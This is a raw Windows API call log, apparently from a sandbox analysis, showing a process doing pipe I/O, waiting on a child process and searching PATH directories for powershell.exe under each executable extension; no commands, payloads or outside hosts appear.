[0099.088] SetEvent (hEvent=0x174) returned 1 [0099.088] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGenRandom") returned 0x75700730 [0099.088] CryptGenRandom (in: hProv=0xa01080, dwLen=0xc, pbBuffer=0x110101e0 | out: pbBuffer=0x110101e0) returned 1 [0099.089] CryptGenRandom (in: hProv=0xa01080, dwLen=0xc, pbBuffer=0x11010200 | out: pbBuffer=0x11010200) returned 1 [0099.089] VirtualAlloc (lpAddress=0x1106a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1106a000 [0099.089] VirtualAlloc (lpAddress=0x1106c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1106c000 [0099.089] GetProcAddress (hModule=0x772d0000, lpProcName="WriteFile") returned 0x7733f180 [0099.090] WriteFile (in: hFile=0x184, lpBuffer=0x11000600*, nNumberOfBytesToWrite=0x75, lpNumberOfBytesWritten=0x110bbcc0, lpOverlapped=0x0 | out: lpBuffer=0x11000600*, lpNumberOfBytesWritten=0x110bbcc0*=0x75, lpOverlapped=0x0) returned 1 [0099.090] VirtualAlloc (lpAddress=0x1106e000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x1106e000 [0099.091] SetEvent (hEvent=0x144) returned 1 [0099.091] GetProcAddress (hModule=0x772d0000, lpProcName="ReadFile") returned 0x7733f090 [0099.091] ReadFile (in: hFile=0x190, lpBuffer=0x1100c4c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x1100c4c0*, lpNumberOfBytesRead=0x11073edc*=0x40, lpOverlapped=0x0) returned 1 [0198.872] SetEvent (hEvent=0x174) returned 1 [0198.873] ReadFile (in: hFile=0x190, lpBuffer=0x11104940, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11104940*, lpNumberOfBytesRead=0x11073edc*=0x8, lpOverlapped=0x0) returned 1 [0198.873] ReadFile (in: hFile=0x190, lpBuffer=0x11104980, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11104980*, lpNumberOfBytesRead=0x11073edc*=0x21, lpOverlapped=0x0) returned 1 [0217.808] SetEvent (hEvent=0x174) returned 1 [0217.809] ReadFile (in: hFile=0x190, lpBuffer=0x111049c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x111049c0*, lpNumberOfBytesRead=0x11073edc*=0x40, lpOverlapped=0x0) returned 1 [0217.809] ReadFile (in: hFile=0x190, lpBuffer=0x11104a40, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11104a40*, lpNumberOfBytesRead=0x11073edc*=0x7, lpOverlapped=0x0) returned 1 [0217.809] ReadFile (in: hFile=0x190, lpBuffer=0x11104a80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11104a80*, lpNumberOfBytesRead=0x11073edc*=0x23, lpOverlapped=0x0) returned 1 [0227.281] SetEvent (hEvent=0x174) returned 1 [0227.281] SetEvent (hEvent=0x144) returned 1 [0227.281] VirtualAlloc (lpAddress=0x11120000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11120000 [0227.282] VirtualAlloc (lpAddress=0x11122000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11122000 [0227.283] WriteFile (in: hFile=0x184, lpBuffer=0x11100170*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x110bbd14, lpOverlapped=0x0 | out: lpBuffer=0x11100170*, lpNumberOfBytesWritten=0x110bbd14*=0x6, lpOverlapped=0x0) returned 1 [0227.283] CancelIoEx (hFile=0x184, lpOverlapped=0x0) returned 0 [0227.283] CloseHandle (hObject=0x184) returned 1 [0227.284] GetProcAddress (hModule=0x772d0000, lpProcName="WaitForSingleObject") returned 0x7733eca0 [0227.284] VirtualAlloc (lpAddress=0x11124000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11124000 [0227.284] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xffffffff) returned 0x0 [0236.181] SetEvent (hEvent=0x174) returned 1 [0236.182] GetProcAddress (hModule=0x772d0000, lpProcName="GetExitCodeProcess") returned 0x772e3c60 [0236.182] GetExitCodeProcess (in: hProcess=0x1a8, lpExitCode=0x110bbd34 | out: lpExitCode=0x110bbd34*=0x0) returned 1 [0236.184] GetProcAddress (hModule=0x772d0000, lpProcName="GetProcessTimes") returned 0x772e5280 [0236.184] GetProcessTimes (in: hProcess=0x1a8, lpCreationTime=0x1109e420, lpExitTime=0x1109e428, lpKernelTime=0x1109e430, lpUserTime=0x1109e438 | out: lpCreationTime=0x1109e420, lpExitTime=0x1109e428, lpKernelTime=0x1109e430, lpUserTime=0x1109e438) returned 1 [0236.184] CloseHandle (hObject=0x1a8) returned 1 [0236.185] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x19f9cc, ulCount=0x10, ulNumEntriesRemoved=0x19f9b0, dwMilliseconds=0x5, fAlertable=0 | out: lpCompletionPortEntries=0x19f9cc, ulNumEntriesRemoved=0x19f9b0) returned 0 [0236.188] SetEvent (hEvent=0x138) returned 1 [0236.188] CancelIoEx (hFile=0x188, lpOverlapped=0x0) returned 0 [0236.188] CloseHandle (hObject=0x188) returned 1 [0236.188] CancelIoEx (hFile=0x190, lpOverlapped=0x0) returned 0 [0236.188] CloseHandle (hObject=0x190) returned 1 [0236.188] VirtualAlloc (lpAddress=0x11126000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11126000 [0236.189] VirtualAlloc (lpAddress=0x11128000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11128000 [0236.189] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x11128000, nSize=0x64 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0236.189] VirtualAlloc (lpAddress=0x1112a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1112a000 [0236.189] VirtualAlloc (lpAddress=0x1112c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1112c000 [0236.190] VirtualAlloc (lpAddress=0x1112e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1112e000 [0236.190] GetFileAttributesExW (in: lpFileName="powershell.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.190] CreateFileW (lpFileName="powershell.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.190] GetFileAttributesExW (in: lpFileName="powershell.exe.com" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.190] CreateFileW (lpFileName="powershell.exe.com" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.190] GetFileAttributesExW (in: lpFileName="powershell.exe.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.190] CreateFileW (lpFileName="powershell.exe.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.191] GetFileAttributesExW (in: lpFileName="powershell.exe.bat" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.191] CreateFileW (lpFileName="powershell.exe.bat" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.191] GetFileAttributesExW (in: lpFileName="powershell.exe.cmd" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.191] CreateFileW (lpFileName="powershell.exe.cmd" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.191] GetFileAttributesExW (in: lpFileName="powershell.exe.vbs" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.191] CreateFileW (lpFileName="powershell.exe.vbs" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.191] GetFileAttributesExW (in: lpFileName="powershell.exe.vbe" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.191] CreateFileW (lpFileName="powershell.exe.vbe" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.191] GetFileAttributesExW (in: lpFileName="powershell.exe.js" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.191] CreateFileW (lpFileName="powershell.exe.js" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.191] GetFileAttributesExW (in: lpFileName="powershell.exe.jse" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.191] CreateFileW (lpFileName="powershell.exe.jse" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.192] GetFileAttributesExW (in: lpFileName="powershell.exe.wsf" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.192] CreateFileW (lpFileName="powershell.exe.wsf" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.192] GetFileAttributesExW (in: lpFileName="powershell.exe.wsh" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.192] CreateFileW (lpFileName="powershell.exe.wsh" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.192] GetFileAttributesExW (in: lpFileName="powershell.exe.msc" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.192] CreateFileW (lpFileName="powershell.exe.msc" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.192] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x111280d0, nSize=0x64 | out: lpBuffer="") returned 0xbc [0236.192] VirtualAlloc (lpAddress=0x11130000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11130000 [0236.192] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x11130000, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0236.192] VirtualAlloc (lpAddress=0x11132000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11132000 [0236.193] VirtualAlloc (lpAddress=0x11134000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11134000 [0236.193] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.193] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.193] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.com" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.193] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.com" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.193] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.exe" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.193] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.exe" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.194] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.bat" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.194] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.bat" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.194] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.cmd" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.194] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.cmd" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.194] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.vbs" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.194] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.vbs" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.194] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.vbe" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.194] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.vbe" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.194] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.js" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.194] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.js" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.195] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.jse" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.195] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.jse" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.195] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.wsf" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.195] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.wsf" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.195] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.wsh" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.195] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.wsh" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff 